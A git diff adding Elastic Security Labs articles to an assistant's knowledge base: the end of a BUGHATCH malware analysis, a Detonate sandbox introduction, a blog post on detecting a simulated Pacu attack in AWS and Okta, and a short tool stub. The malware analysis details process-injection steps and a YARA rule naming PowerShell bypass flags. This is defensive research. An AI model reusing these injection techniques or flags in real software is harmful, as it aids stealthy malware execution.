+If no credentials are specified, the implant will impersonate the **explorer.exe** process by duplicating its token with **DuplicateTokenEx** and then spawn the current process with the duplicated token.
+
+![Example of an ImpersonateToken command received from an emulated C2](/assets/images/bughatch-malware-analysis/image21.png)
+
+#### MigrateC2
+
+The operator can migrate the implant to another C2 server by specifying the subcommand **0x1001** with the IP address of the new C2.
+ +![Pseudocode migrating the implant](/assets/images/bughatch-malware-analysis/image4.jpg) + +![Example of a MigrateC2 command received from an emulated C2](/assets/images/bughatch-malware-analysis/image31.png) + +### Command 3 + +When command 3 is received the malware will reflectively load a PE file embedded as payload in the C&C request in another process's memory space, the following is an overview of the execution: + +- Determine the type and architecture of the PE file +- Create a suspended process +- Allocate a large memory in the suspended process +- Write a shellcode in the allocated memory that will locate, decrypt and reflectively load the PE file +- 2-byte XOR encrypt the PE file and append it after the shellcode +- Set the EIP context of the suspended process to execute the shellcode + +The shellcode will then reflectively load the PE file + +![Pseudocode for Command 3's main logic](/assets/images/bughatch-malware-analysis/image6.jpg) + +The agent first parses the PE file received from the C2 server to determine the type and architecture of the PE file. + +![Pseudocode determines the PE file architecture](/assets/images/bughatch-malware-analysis/image28.jpg) + +And according to this information, a Windows signed executable will be chosen to inject into. + +If the PE file is CUI (Console User Interface), the malware will choose **cmd.exe** , however, if it is GUI (Graphical User Interface) or a DLL PE file it will choose **svchost.exe**. + +![Options for malware to inject into](/assets/images/bughatch-malware-analysis/image11.jpg) + +The malware will then create a suspended process with **CreateProcessA** API (either **cmd.exe** or **svchost.exe** ) and allocate a large amount of memory with **VirtualAllocEx** in the created process, it will then copy a position independent shellcode stored in the **.rdata** section to the newly allocated memory that is responsible for locating according to a specific tag the appended PE file, decrypt it and reflectively load it in memory. + +Then it appends after the shellcode a 12 bytes structure composed of a tag, the size of the PE file, and a 2-byte XOR key. + +It will then 2-byte XOR encrypt the PE file and append it after the structure, the following is an overview of the written data to the allocated memory: + +| | | | | | +| --------- | --- | ------- | -------------- | ---------------------------- | +| SHELLCODE | TAG | PE SIZE | 2-byte XOR KEY | 2-byte XOR encrypted PE file | + +![Pseudocode write shellcode and PE to child process](/assets/images/bughatch-malware-analysis/image27.jpg) + +The agent will then set the thread context with **SetThreadContext** and point the instruction pointer of the suspended process to the shellcode then it will simply resume the execution with **ResumeThread**. + +The shellcode will first locate the 2-byte XOR encrypted PE file according to the tag value ( **0x80706050** ), it will then 2-byte XOR decrypt it and load it reflectively on the same process memory. + +## Observed adversary tactics and techniques + +Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that advanced persistent threats use against enterprise networks. + +### Tactics + +Tactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action. 
+ +- [Execution](https://attack.mitre.org/tactics/TA0002) +- [Collection](https://attack.mitre.org/tactics/TA0009) +- [Command and Control](https://attack.mitre.org/tactics/TA0011) +- [Exfiltration](https://attack.mitre.org/tactics/TA0010) + +### Techniques / sub techniques + +Techniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action. + +- [Command and Scripting Interpreter: Windows Command Shell](https://attack.mitre.org/techniques/T1059/003/) +- [Encrypted Channel: Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002/) +- [Encrypted Channel: Symmetric Cryptography](https://attack.mitre.org/techniques/T1573/001/) +- [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041/) +- [Automated Collection](https://attack.mitre.org/techniques/T1119/) +- [Native API](https://attack.mitre.org/techniques/T1106/) + +## Detections + +### Detection rules + +The following detection rule was observed during the analysis of the BUGHATCH sample. This rule is not exclusive to BUGHATCH activity. + +- [Enumeration of Privileged Local Groups Membership](https://www.elastic.co/guide/en/security/current/enumeration-of-privileged-local-groups-membership.html#enumeration-of-privileged-local-groups-membership) + +### YARA rule + +Elastic Security has created a [YARA rule](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_Bughatch.yar) to identify this activity. + +``` +rule Windows_Trojan_BUGHATCH { + meta: + author = “Elastic Security” + creation_date = "2022-05-09" + last_modified = "2022-06-09" + license = “Elastic License v2” + os = "Windows" + arch = "x86" + category_type = "Trojan" + family = "BUGHATCH" + threat_name = "Windows.Trojan.BUGHATCH" + reference_sample = "b495456a2239f3ba48e43ef295d6c00066473d6a7991051e1705a48746e8051f" + + strings: + $a1 = { 8B 45 ?? 33 D2 B9 A7 00 00 00 F7 F1 85 D2 75 ?? B8 01 00 00 00 EB 33 C0 } + $a2 = { 8B 45 ?? 0F B7 48 04 81 F9 64 86 00 00 75 3B 8B 55 ?? 0F B7 42 16 25 00 20 00 00 ?? ?? B8 06 00 00 00 EB ?? } + $a3 = { 69 4D 10 FD 43 03 00 81 C1 C3 9E 26 00 89 4D 10 8B 55 FC 8B 45 F8 0F B7 0C 50 8B 55 10 C1 EA 10 81 E2 FF FF 00 00 33 CA 8B 45 FC 8B 55 F8 66 89 0C 42 } + $c1 = "-windowstyle hidden -executionpolicy bypass -file" + $c2 = "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" + $c3 = "ReflectiveLoader" + $c4 = "\\Sysnative\\" + $c5 = "TEMP%u.CMD" + $c6 = "TEMP%u.PS1" + $c7 = "\\TEMP%d.%s" + $c8 = "NtSetContextThread" + $c9 = "NtResumeThread" + + condition: + any of ($a*) or 6 of ($c*) +} +``` diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/callout_example.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/callout_example.md new file mode 100644 index 0000000000000..6ca57349245c6 --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/callout_example.md @@ -0,0 +1,31 @@ +--- +title: "Callout example" +slug: "callout-example" +date: "1883-1-1" +description: "This is an article with callout examples." +author: + - slug: andrew-pease +image: "../../security-labs-thumbnail.png" +category: + - slug: reports +--- + + + The content for the callout goes here. It can have **bold** or *italic* text, + and can also include [links](https://www.elastic.co) if needed. + + + + The content for the callout goes here. It can have **bold** or *italic* text, + and can also include [links](https://www.elastic.co) if needed. + + + + The content for the callout goes here. 
It can have **bold** or *italic* text,
+  and can also include [links](https://www.elastic.co) if needed.
+
+
+
+  The content for the callout goes here. It can have **bold** or *italic* text,
+  and can also include [links](https://www.elastic.co) if needed.
+
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/click_click_boom_automating_protections_testing_with_detonate.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/click_click_boom_automating_protections_testing_with_detonate.md
new file mode 100644
index 0000000000000..ed971a348128f
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/click_click_boom_automating_protections_testing_with_detonate.md
@@ -0,0 +1,67 @@
+---
+title: "Click, Click… Boom! Automating Protections Testing with Detonate"
+slug: "click-click-boom-automating-protections-testing-with-detonate"
+date: "2023-05-04"
+description: "To automate this process and test our protections at scale, we built Detonate, a system that is used by security research engineers to measure the efficacy of our Elastic Security solution in an automated fashion."
+author:
+  - slug: jessica-david
+  - slug: hez-carty
+  - slug: sergey-polzunov
+image: "blog-thumb-tools-various.jpg"
+category:
+  - slug: tools
+  - slug: security-research
+  - slug: detection-science
+tags:
+  - detonate
+---
+
+## Preamble
+
+Imagine you are an Endpoint artifact developer. After you put in the work to ensure protection against conventional shellcode injections or ransomware innovations, how do you know it actually works before you send it out into the world?
+
+First, you set up your end-to-end system, which involves setting up several services, the infrastructure, network configuration, and more. Then, you run some malware; the data you collect answers questions about performance and efficacy, and may be an important research resource in the future. After you spend a day testing and gathering your results, you may want to run several hundred hashes over multiple kinds of operating systems and machine types, a daunting task if done entirely manually.
+
+To automate this process and test our protections at scale, we built Detonate, a system that is used by security research engineers to measure the efficacy of our Elastic Security solution in an automated fashion. Our goal is to have it take security researchers only a couple of clicks to test our protections against malware. (Thus: click, click… boom!)
+
+In this series of posts, we’ll:
+
+- Introduce Detonate and why we built it
+- Explore how Detonate works and the technical implementation details
+- Describe case studies on how our teams use it at Elastic
+- Discuss opening our efficacy testing to the community to help the world protect their data from attack
+
+Interested in other posts on Detonate? Check out [Part 2 - Into The Weeds: How We Run Detonate](https://www.elastic.co/security-labs/into-the-weeds-how-we-run-detonate) where we break down how Detonate works and dive deeper into the technical implementation.
+
+## What is Detonate?
+
+At a high level, Detonate runs malware and other potentially malicious software in a controlled (i.e., sandboxed) environment where the full suite of Elastic Security capabilities is enabled.
Detonate accepts a file hash (usually a SHA256) and performs the following actions: + +- Prepares all files needed for detonation, including the malicious file +- Provisions a virtual machine (VM) instance in a sandboxed environment, with limited connectivity to the outside world +- Waits until file execution completes; this happens when, for example, an execution result file is found or the VM instance is stopped or older than a task timeout +- Stops the running VM instance (if necessary) and cleans up the sandboxed environment +- Generates an event summary based on telemetry and alerts produced during detonation + +The results of these detonations are made available to the team for research and development purposes. By post-processing the logs, events, and alerts collected during detonation, we can enrich them with third-party intelligence and other sources to evaluate the efficacy of new and existing Elastic Security protection features. + +## What does it help us with? + +### Measuring Efficacy + +To build the best EPP on the market, we have to continuously measure the effectiveness of our product against the latest threats. Detonate is used to execute many tens of thousands of samples every month from our data feeds. Gaps in coverage are automatically identified and used to prioritize improvements to our protections. + +### Supporting existing protections + +Many of our protections have associated artifacts (such as machine learning models and rule definitions) which receive regular updates. These updates need testing to ensure we identify and remediate regressions before they end up in a user’s environment. + +Detonate provides a framework and suite of tools to automate the analysis involved in this testing process. By leveraging a corpus of hashes with known good and bad software, we can validate our protections before they are deployed to users. + +### Threat research + +Some of our security researchers scour the internet daily for new and emerging threats. By giving them an easy-to-use platform to test malicious software they find in the wild, we better understand how Elastic Security defends against those threats or if we need to update our protections. + +### Evaluating new protections + +In addition to testing existing protections, new protections run the risk of adverse interactions with our existing suite of layered capabilities. A new protection may be easily tested on its own, but tests may hide unintended interactions or conflicts with existing protections. Detonate provides a way for us to customize the configuration of the Elastic Stack and individual protections to more easily find and identify such conflicts earlier in development. + +## What’s next? + +In this publication, we introduced Detonate & what we use it for at Elastic. We discussed the benefits it provides our team when assessing the performance of our security artifacts. + +Now that you know what it is, we will break down how Detonate works. In our next post, we’ll dive deeper into the technical implementation of Detonate and how we’re able to create this sandboxed environment in practice. 
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cloud_monitoring_and_detection_with_elastic_security.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cloud_monitoring_and_detection_with_elastic_security.md new file mode 100644 index 0000000000000..3ce3719c061ec --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cloud_monitoring_and_detection_with_elastic_security.md @@ -0,0 +1,193 @@ +--- +title: "Security operations: Cloud monitoring and detection with Elastic Security" +slug: "cloud-monitoring-and-detection-with-elastic-security" +date: "2022-11-30" +description: "As companies migrate to cloud, so too do opportunist adversaries. That's why our Elastic Security team members have created free detection rules for protecting users' cloud platforms like AWS and Okta. Learn more in this blog post." +author: + - slug: brent-murphy + - slug: david-french + - slug: elastic-security-intelligence-analytics-team +image: "blog-thumb-network-attack-map.jpg" +category: +--- + +As many organizations have migrated their infrastructure, applications, and data to cloud offerings, adversaries have extended their operational capabilities in cloud environments to achieve their mission — whether that means stealing intellectual property, disrupting business operations, or holding an organization's data for ransom. In order to protect our users' data from attack, the Elastic Security Intelligence & Analytics Team researches and develops [rules](https://www.elastic.co/blog/elastic-security-opens-public-detection-rules-repo) to detect attacker behavior in the cloud _and_ on the endpoint. + +In this post, we'll discuss cloud monitoring and detection-related challenges security operations teams face, and why attacks against cloud environments are often successful. We will share details on our free cloud detection rules (including many new ones released in [Elastic Security 7.9](https://www.elastic.co/blog/whats-new-elastic-security-7-9-0-free-endpoint-security)) and show how they can help [Elastic Security](https://www.elastic.co/security) users. + +We'll also explain how Elastic can ingest logs from a wide variety of cloud platforms and how the Elastic Common Schema (ECS) makes searching, monitoring, and detection easy for defenders. + +## Cloud monitoring and detection challenges + +Security teams typically encounter one or more of the following challenges when they're asked to monitor, detect, and respond to threats in their organization's cloud environments: + +- **Resource constraints:** It can take a considerable amount of time to learn and understand cloud technologies and their ever-changing data sources. Many security operations teams do not have the resources to allocate to this ongoing effort. +- **Understanding of adversary tradecraft:** Attacker behavior on well-known platforms such as Windows has been researched extensively and shared with the security community. Security teams may not have an in-depth understanding of how adversaries operate in cloud environments or the ability to provision a test environment to practice offensive and defensive techniques to protect their organization. +- **Blind spots:** For effective monitoring and detection, the data available to security practitioners must be relevant, accurate, and timely. Cloud logs shipped to a SIEM can be used for detection and response as long as the security team can depend on the quality of the data. 
+- **Data normalization:** Most cloud platforms have their own log categories and event schema. Normalizing logs into a common schema is not a trivial or one-off task. Some security teams, for example, have several different field names for a hostname across their data sources indexed in their SIEM. Without a normalized and documented schema, it can be difficult for analysts — especially less experienced ones — to write search queries and correlate events across data sources effectively. + +## Ingesting and searching cloud logs with Elastic + +Elastic has a large collection of Filebeat [modules](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-modules.html) that can be used to simplify the collection, parsing, and visualization of many diverse log formats into a common schema — including cloud platforms such as [Amazon Web Services (AWS)](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-aws.html), [Azure](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-azure.html), [Okta](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-okta.html), and [Office 365](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-o365.html). Rapid development of new Filebeat modules is an ongoing process. + +The [Elastic Common Schema](https://www.elastic.co/guide/en/ecs/current/ecs-reference.html) (ECS) defines a common set of fields for ingesting logs from a connected data source (e.g., AWS/Okta) into Elasticsearch. Log data is normalized into a format where the various field names can be used in queries to correlate behavior across data sources. This is useful to security and IT operations teams for a number of reasons. + +Practitioners and administrators do not need to spend countless hours transforming or normalizing their ingested logs so that the field names follow their own common schema. Managing a schema like this yourself is no small undertaking and is a continuous effort. Elastic manages ECS (saving users time and resources) so that security teams can rely on a common set of field names to search their data quickly and efficiently. + +End users can rely on using the same field names in their queries when searching across multiple data sources, which presents the following advantages: + +- Having a consistent schema for searching saves security analysts time and lowers the barrier to entry for new analysts. Analysts don't have to learn or remember all of the different field names and their purpose for each data source. +- Analysts can correlate events across data sources such as endpoint, proxy, and firewall, which helps them ask questions of their data more efficiently and make sound decisions during an investigation, incident, or hunt. +- It's easy for analysts to produce a timeline or build a visualization of the activity that occurred. + +## Detecting attackers operating in cloud environments + +The Elastic Security Intelligence & Analytics Team's research into adversary tradecraft leads to new detection features like rules and machine learning jobs — capabilities that enable small security teams to have an outsized impact. Security features like these increase the cost of an attack for adversaries. Elastic Security users can expect to see a continued focus on increasing the cost of cloud attacks. + +In the remainder of this blog post, we'll simulate attack techniques against AWS and Okta cloud environments. 
We'll review the alerts that are generated by the suspicious activity and how an analyst can perform initial triage and complete their investigation using Elastic Security. We will also demonstrate how analysts can add exceptions to detection rules in order to filter benign events and continue to alert on suspicious behavior. + +## Monitoring AWS CloudTrail logs to detect suspicious behavior + +As organizations migrate to or provision new infrastructure in cloud platforms like AWS, they face the common challenges that we described earlier. Fortunately, Elastic Security has a [strong variety of AWS rules](https://github.com/elastic/detection-rules/tree/main/rules/aws), available for [free in 7.9](https://www.elastic.co/blog/whats-new-elastic-security-7-9-0-free-endpoint-security) to detect suspicious behaviors in an AWS environment. + +The Filebeat [module](https://www.elastic.co/guide/en/beats/filebeat/master/filebeat-module-aws.html) for AWS helps you easily ship CloudTrail, Simple Storage Service (S3), Elastic Load Balancing (ELB), and virtual private cloud (VPC) flow logs to Elasticsearch for monitoring and detection in Elastic Security. Let's walk through an attack and defense scenario utilizing CloudTrail data. [CloudTrail](https://aws.amazon.com/cloudtrail/) provides event history of your AWS account activity, including actions taken through the AWS Management Console, AWS software development kits (SDKs), command line tools, and other AWS services. This event history can help simplify security detection, analysis, and investigations. + +Many attacks against AWS start with an attacker obtaining an access key and/or the secret access key details. These keys may be harvested in a variety of ways, including through phishing, a data breach, GitHub repositories, screenshots, error messages, snapshot data, or simply poor key management practices. By obtaining these keys, an attacker can take a variety of actions against your AWS infrastructure. + +Let's walk through one of the many potential attack scenarios that could play out. In the following example, the adversary enumerates the trails and monitoring capabilities that have been configured for the AWS account. They follow up on this activity by disabling a trail and a configuration recorder in an attempt to evade detections and then proceed to harvest secrets. + +### Simulating adversary behavior in AWS + +In this demonstration, we'll use [Pacu](https://github.com/RhinoSecurityLabs/pacu) to perform our attack. Pacu is a popular framework for exploiting AWS infrastructure, developed and maintained by Rhino Security Labs. Pacu is modular, similar to other exploitation frameworks like Metasploit and Koadic, and enables attackers to exploit configuration flaws within an AWS account. Attackers can use Pacu to check if the required permissions are assigned to the compromised account before attempting to execute a module. This can be helpful from an attacker's perspective to not create unnecessary noise and logs, and draw additional attention from defenders by running modules that will ultimately fail. + +The attacker begins by enumerating services using the detection\_\_enum_services module to determine what logging and monitoring services are enabled for the AWS account. 
+ +![Figure 1 - Enumerating services using Pacu’s detection__enum_services module ](/assets/images/cloud-monitoring-and-detection-with-elastic-security/1-enumerating-services-blog-secops-cloud-platform-monitoring.jpg) + +The attacker discovered eight trails, as well as ten configuration rules, a recorder, and a delivery channel. Essentially, the enumeration script is querying certain AWS API calls to list or describe relevant information about the environment. By reviewing the [code](https://github.com/RhinoSecurityLabs/pacu/blob/master/modules/detection__enum_services/main.py) of the module, we can see the targeted APIs: + +``` +DescribeSubscription +GetSubscriptionState +DescribeTrails +ListDetectors +DescribeConfigRules +DescribeConfigurationRecorders +DescribeConfigurationRecorderStatus +DescribeDeliveryChannels +DescribeDeliveryChannelStatus +DescribeConfigurationAggregators +DescribeAlarms +DescribeFlowLogs +``` + +After the attacker determines which services are running, their next logical step may be to interrupt logging and monitoring by disabling a trail, alarm, detector, or recorder in an attempt to evade detection. To accomplish this objective, we'll use a different module called detection\_\_disruption to disable a trail called brentlog, and stop the configuration recorder named default. + +![Figure 2 - Disabling a trail and stopping a configuration recorder using Pacu’s detection__disruption module ](/assets/images/cloud-monitoring-and-detection-with-elastic-security/2-disabling-trail-blog-secops-cloud-platform-monitoring.jpg) + +At this point, with trail logging suspended and the configuration recorder turned off from tracking changes to resources, the attacker may want to check if there are any credentials, API keys, or tokens available in [Secrets Manager](https://aws.amazon.com/about-aws/whats-new/2018/04/introducing-aws-secrets-manager/#:~:text=AWS%20Secrets%20Manager%20is%20a,other%20secrets%20throughout%20their%20lifecycle.) and if so, collect them. In this scenario, the attacker uses the enum_secrets module and finds one secret in the directory, /sessions/brent/downloads/secrets/secrets_manager. Harvesting these secrets could help the adversary achieve lateral movement and/or privilege escalation. + +![Figure 3 - Searching for AWS secrets using Pacu's enum__secrets module](/assets/images/cloud-monitoring-and-detection-with-elastic-security/3-searching-aws-blog-secops-cloud-platform-monitoring.jpg) + +![Figure 4 - Viewing the AWS secret after its discovery](/assets/images/cloud-monitoring-and-detection-with-elastic-security/4-viewing-aws-blog-secops-cloud-platform-monitoring.jpg) + +We'll stop our fictitious attack scenario here, but if you're curious to learn what the attacker could do next, the following Google search will return some examples: intitle:"AWS" intext:("attack" | "breach"). In the next section, we'll look at what this behavior looks like from a defender's perspective and how Elastic Security can be used to detect this behavior. + +### Detecting and investigating the suspicious behavior in AWS + +While monitoring the usage of the previously mentioned APIs, it can be difficult to distinguish benign activity from suspicious behavior, such as an attacker enumerating an environment. In production environments, monitoring for calls to these APIs can be noisy, as the behavior is quite common. 
To help find this rare and potentially suspicious behavior, and in addition to the AWS detection rules we have available, we've released [machine learning](https://github.com/elastic/detection-rules/tree/main/rules/ml) jobs in 7.9 specifically for AWS CloudTrail that help identify outliers, such as patterns of unusual activity that are hard to find using conventional detection rules. + +Looking at our detections page from the previous attack, we can see multiple alerts were triggered. Our free built-in detection rules identified the techniques of _suspending a trail_, _stopping a configuration recorder_, and _grabbing sensitive information from the secrets manager_. The other alerts are from the machine learning jobs of [_Unusual Country For an AWS Command_](https://www.elastic.co/guide/en/security/7.9/unusual-city-for-an-aws-command.html) and [_Unusual AWS Command for a User_](https://www.elastic.co/guide/en/security/master/unusual-aws-command-for-a-user.html) which identify a geolocation (country) that is unusual for the command or a user context that does not normally use the command. + +![Figure 5 - Viewing the detection alerts in Elastic Security](/assets/images/cloud-monitoring-and-detection-with-elastic-security/5-viewing-detection-alerts-blog-secops-cloud-platform-monitoring.jpg) + +If we pivot into one of the machine learning alerts, we can see a description of what it detected, along with a built-in investigation guide to walk an analyst through a potential workflow when analyzing an unusual CloudTrail event. + +![Figure 6 - Viewing the details of a machine learning alert](/assets/images/cloud-monitoring-and-detection-with-elastic-security/6-machine-learning-alert-blog-secops-cloud-platform-monitoring.jpg) + +![Figure 7 - Viewing the investigation notes for an unusual CloudTrail event](/assets/images/cloud-monitoring-and-detection-with-elastic-security/7-viewing-investigation-notes-blog-secops-cloud-platform-monitoring.png) + +Let's also take a look at the details in the Timeline view from the [_AWS Configuration Recorder Stopped_](https://www.elastic.co/guide/en/security/master/aws-configuration-recorder-stopped.html) alert. The fields I'm particularly interested in are the API call, user agent string, user identity type, request parameters, and the raw text of the entire event. + +![Figure 8 - Analyzing the alert details in the Timeline](/assets/images/cloud-monitoring-and-detection-with-elastic-security/8-alert-details-timeline-blog-secops-cloud-platform-monitoring.png) + +By analyzing the alert, we're able to quickly determine: + +| | | +| ------------------ | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | +| Field | Description | +| event.action | Tells us the AWS API call that was made, StopConfigurationRecorder | +| request_parameters | Gives us the details about what was sent in the request, in our case, the configuration recorder name, default | +| user.name | Informs us as to who made the request, pacu | +| user_identity.type | Contains details about the type of Identity and Access Management (IAM) identity. In our case, an IAMUser. Root is another user identity type we have built in rules for. | +| user_agent | The value of the HTTP User-Agent header. 
User agent strings can be easily modified, but if an account typically uses the AWS Java SDK for their API calls, and it changes, then the detection of the anomalous user agent string can be a quick win. | +| event.original | Gives us the raw alert details | + +_Table 1 - Analysis of alert fields_ + +After analyzing the alert, we can start to piece together the events and look at what actions the user took just before our alerts fired (and afterwards as applicable). Again, we can spot the attackers enumeration here as well. + +![Figure 9 - Viewing event history for the user Pacu in the Timeline ](/assets/images/cloud-monitoring-and-detection-with-elastic-security/9-event-history-blog-secops-cloud-platform-monitoring.png) + +We may also want to search our environment for specific API calls to see if they were invoked by other users or hosts, from different IPs, or at other time frames that would be suspicious in our environment. + +![Figure 10 - Viewing API call history for the StopConfigurationRecorder API in the Timeline ](/assets/images/cloud-monitoring-and-detection-with-elastic-security/10-api-history-blog-secops-cloud-platform-monitoring.png) + +We can also create a visualization to look for the least common API calls in our environment and pivot from there. For AWS, the API calls are in the event.action field. + +![Figure 11 - Using a visualization to look for least common API calls in our environment ](/assets/images/cloud-monitoring-and-detection-with-elastic-security/11-visualization-api-calls-blog-secops-cloud-platform-monitoring.png) + +As demonstrated, our free built-in rules for AWS can detect this activity as well as a number of other potential attack scenarios. We've opened up our [rules repository](https://github.com/elastic/detection-rules) and encourage you to have a look and learn how to [contribute](https://github.com/elastic/detection-rules#how-to-contribute) if interested. + +## Detecting suspicious behavior in Okta logs + +[Okta single sign-on (SSO)](https://www.okta.com/products/single-sign-on/) is a cloud solution that allows users to log into a variety of systems in their organization via a centralized process using a single user account. Informing end users that they only have to remember one username and password instead of ten or more reduces the risk that they'll adopt poor password hygiene and enables system administrators to enforce stronger password policies. Further, multi-factor authentication (MFA) policies can be configured in Okta, which raises the barriers to entry for attackers. Many attackers will simply move on to look for an easier target when they discover that MFA is enforced for their target's network or user account. + +While SSO solutions can provide a convenient user experience and reduce cybersecurity risk for an organization, these centralized systems that offer a type of skeleton key to many systems and applications are often an attractive target for attackers. For example, if an adversary manages to harvest an Okta administrator's credentials or API token, they could attempt to perform any of the actions in the non-exhaustive list below: + +- Modify or disable MFA policies for one or more applications in order to weaken their victim's security controls. +- Create new user accounts or API tokens to maintain persistence in their target's environment and attempt to “blend in” and evade detection. +- Modify, delete, or deactivate an Okta network zone to loosen the restrictions on which geolocation users or administrators can login from. 
+- Delete or disable an application or other configuration to create a Denial-of-Service (DoS) condition and impact a company's business operations.
+
+To enable security teams to monitor their Okta environment for suspicious activity, our [Okta Filebeat module](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-okta.html) can pull [Okta System Log](https://developer.okta.com/docs/reference/api/system-log/) events and ship them to Elasticsearch to be indexed. Okta's System Log records events related to an organization in order to provide an audit trail that can be used to understand platform activity. The Elastic Security Intelligence & Analytics Team has [free rules](https://github.com/elastic/detection-rules/tree/main/rules/okta) to detect suspicious activity in Okta logs and will continue adding more in the future.
+
+In the following example, imagine that an adversary has harvested an API token after gaining initial access to an organization's network. The API token has administrator privileges and the adversary executes several actions in their target's Okta environment:
+
+- Create a new user account and assign administrative permissions to it in order to maintain a presence in the target environment should the security team discover that the current API token is compromised
+- Deactivate a sign-on policy in order to weaken the target's security controls
+- Disable a network zone to enable attackers to authenticate from any geographical location during their intrusion
+
+The Okta Filebeat module was configured to ship Okta System Log events to Elasticsearch and our Okta rules were activated in Elastic Security. The suspicious activity triggered the three alerts shown in Figure 12 below.
+
+![Figure 12 - Okta alerts in Elastic Security generated by suspicious activity](/assets/images/cloud-monitoring-and-detection-with-elastic-security/12-okta-alerts-blog-secops-cloud-platform-monitoring.png)
+
+Clicking on one of the alerts allows the analyst to review more information about the rule, including the description of the behavior that the rule detects, severity and risk scores, and the associated MITRE ATT&CK® tactic and technique. The analyst can scroll further down the page and begin to investigate the alert in Timeline.
+
+To learn more about how Elastic supports ATT&CK, see our presentation: [How to Plan and Execute a Hunt](https://youtu.be/2Hh5spqA6bw).
+
+![Figure 13 - Viewing a rule's information and settings](/assets/images/cloud-monitoring-and-detection-with-elastic-security/13-rule-information-blog-secops-cloud-platform-monitoring.png)
+
+Security practitioners know that every organization's network is different. Behavior that looks suspicious in one environment may be benign in another. To help security teams find the proverbial “signal in the noise,” users can add exceptions to their detection rules to filter benign events and continue to alert on suspicious events. Figure 14 shows an exception being added to an Okta rule.
+
+![Figure 14 - Adding an exception to a rule in Elastic Security](/assets/images/cloud-monitoring-and-detection-with-elastic-security/14-adding-exception-blog-secops-cloud-platform-monitoring.jpg)
+
+We've also introduced the "threshold" rule type. Threshold rules aggregate query results and generate an alert when the number of matched events exceeds a certain threshold. The example rule below will generate an alert when 25 Okta user authentication failures occur from a single source IP address.
This can be indicative of a brute force or password spraying attack. + +![Figure 15 - Reviewing a threshold rule configured to detect an Okta brute force attack](/assets/images/cloud-monitoring-and-detection-with-elastic-security/15-okta-brute-force-blog-secops-cloud-platform-monitoring.png) + +Viewing an alert generated by a threshold rule in the Timeline allows an analyst to review the events that triggered the rule and begin their triage process or investigation. + +![Figure 16 - Reviewing an alert from a failed Okta authentication threshold rule in Timeline](/assets/images/cloud-monitoring-and-detection-with-elastic-security/16-reviewing-alert-blog-secops-cloud-platform-monitoring.png) + +## Conclusion + +According to Verizon's latest [Data Breach Investigations Report](https://enterprise.verizon.com/resources/reports/dbir/), cloud assets were involved in 24% of the report's 3,950 data breaches reviewed last year. As organizations continue to migrate their data and business operations to the cloud, we can expect this number to increase. + +In this blog post, we discussed some of the challenges that security teams face when attempting to monitor for, detect, and investigate suspicious behavior in their organization's cloud environments. We walked through some practical examples on how attackers operate in cloud environments and how Elastic Security can detect those techniques. + +The Elastic Security Intelligence & Analytics Team researches adversary tradecraft and develops new detection rules and machine learning jobs for multiple platforms including cloud. Our users can expect to see our continued focus on increasing the cost of cloud attacks. + +Configuring our [Filebeat modules](https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-modules.html) to ship logs to Elasticsearch and enable detection rules in Elastic Security is easy. Our [free detection rules](https://github.com/elastic/detection-rules) help security teams monitor those logs and detect suspicious behavior, regardless of the size of their team. Elastic Security enables analysts to triage and investigate those alerts quickly and efficiently. + +If you're interested in learning more about Elastic Security, you can [download it for free](https://www.elastic.co/security) or sign up for a free 14-day trial of [Elastic Cloud](https://www.elastic.co/cloud/). diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cobalt_strike_beacon_extractor.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cobalt_strike_beacon_extractor.md new file mode 100644 index 0000000000000..04a962656507c --- /dev/null +++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/cobalt_strike_beacon_extractor.md @@ -0,0 +1,125 @@ +--- +title: "Cobalt Strike Beacon Extractor" +slug: "cobalt-strike-beacon-extractor" +date: "2022-12-06" +description: "Python script that collects Cobalt Strike memory data generated by security events from an Elasticsearch cluster, extracts the configuration from the CS beacon, and writes the data back to Elasticsearch." +author: + - slug: elastic-security-labs +image: "tools-image.jpg" +category: + - slug: tools +tags: + - cobaltstrike +--- + +Python script that collects Cobalt Strike memory data generated by security events from an Elasticsearch cluster, extracts the configuration from the CS beacon, and writes the data back to Elasticsearch. 
